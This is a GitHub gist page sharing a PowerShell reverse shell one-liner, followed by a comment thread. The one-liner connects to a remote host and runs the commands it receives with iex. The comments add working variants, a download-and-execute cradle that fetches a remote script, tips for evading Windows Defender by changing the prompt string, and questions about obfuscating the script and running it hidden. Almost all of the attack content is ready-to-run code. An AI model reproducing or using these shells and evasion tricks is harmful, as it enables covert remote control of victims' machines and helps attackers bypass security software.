Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@ThunderSon

This comment has been minimized.

Copy link

@ThunderSon ThunderSon commented Jul 9, 2018

Hello. Kindly check my fork to the project. The IP field has a typo.

@egre55

This comment has been minimized.

Copy link
Owner Author

@egre55 egre55 commented Jul 9, 2018

hey, thanks for the heads up!

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Apr 15, 2019

Using sockets without obfuscation or string encryption is a high risk, windows can log data connexion to the c&c server and some firewalls such as zone alarm block the packets.

@T3nsh0

This comment has been minimized.

Copy link

@T3nsh0 T3nsh0 commented Aug 7, 2019

@chnz2k how do you add obfuscation to a script ??

@egre55

This comment has been minimized.

Copy link
Owner Author

@egre55 egre55 commented Aug 9, 2019

the Invoke-Obfuscation project is definitely worth checking out @PLEASEFORGETME2

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Which Listener can be used? Netcat? or msfconsole?

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Ok, But can we obfuscate this script? And when i run the script it says this.

Capture

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Yes it is working now! But how to obfuscate it?

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Thanks Mate!

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

And where i can scan for the results of .ps1 file? It doesnt works on anti scan.me and nodistribute also doesnt works

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Hi!
I tried to run the code and i got a connection but when i type any command the connection exits, And on the powershell side i have output like this

Capture
Capture

Also I am sharing the code which will download the reverse shell .ps1 from the kali server, and executes it.
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4/mypowershell.ps1');mypowershell.ps1"

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Also it ran first time but second time it was detected.

@egre55

This comment has been minimized.

Copy link
Owner Author

@egre55 egre55 commented Jul 25, 2020

try this: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')" @Vedant-Bhalgama

with your reverse shell looking like:

$client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

you should get a shell on your Netcat listener on port 80

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Jul 25, 2020

@egre55

This comment has been minimized.

Copy link
Owner Author

@egre55 egre55 commented Jul 25, 2020

if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Yes! I am not using it for Non Ethical purposes bro! I am a Ethical Hacker and need this for pentensting purpose!

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Jul 25, 2020

Script Is running now but it gives detection error
@egre55, What were you telling to replace? to evade defender? Can u do the changes in the code?

Capture

@epicn1337

This comment has been minimized.

Copy link

@epicn1337 epicn1337 commented Aug 21, 2020

One way or the other this script can be a disaster this is the best way i run such script::::::::::::: make sure you add the powershell -nop -c followed:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Aug 21, 2020

Which listener can be used for this? NetCat?

@egre55

This comment has been minimized.

Copy link
Owner Author

@egre55 egre55 commented Aug 21, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

@Vedant-Bhalgama Vedant-Bhalgama commented Aug 22, 2020

It got detected as MaliciousContent, Anything else? Should I try Obfuscation?

@Yashraj-Garnayak

This comment has been minimized.

Copy link

@Yashraj-Garnayak Yashraj-Garnayak commented Nov 4, 2020

After executing it in PowerShell with IP and port changed but it is showing....... "new object exception calling ctor with 2 argument s connection attempt failed " what to do because I am not a PowerShell expert.
I run the netcat server in the Virtualbox

@chnz2k

This comment has been minimized.

Copy link

@chnz2k chnz2k commented Nov 12, 2020

@munteanulc

This comment has been minimized.

Copy link

@munteanulc munteanulc commented Jan 11, 2021

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

@cnibbler

This comment has been minimized.

Copy link

@cnibbler cnibbler commented Feb 11, 2021

Hi, Kindly check my fork.

Just a small change to the way commands are run to ensure any non-stdout text is sent back. (except for confirmation prompts).

Without this, due to the way in which the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.

Thanks,

@pentestblogin

This comment has been minimized.

Copy link

@pentestblogin pentestblogin commented Apr 16, 2021

[vry nice )

@pretech86

This comment has been minimized.

Copy link

@pretech86 pretech86 commented Apr 27, 2021

i tried to run it silently by -WindowsStyle Hidden -NoLog but it not working , how can i run it silently

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment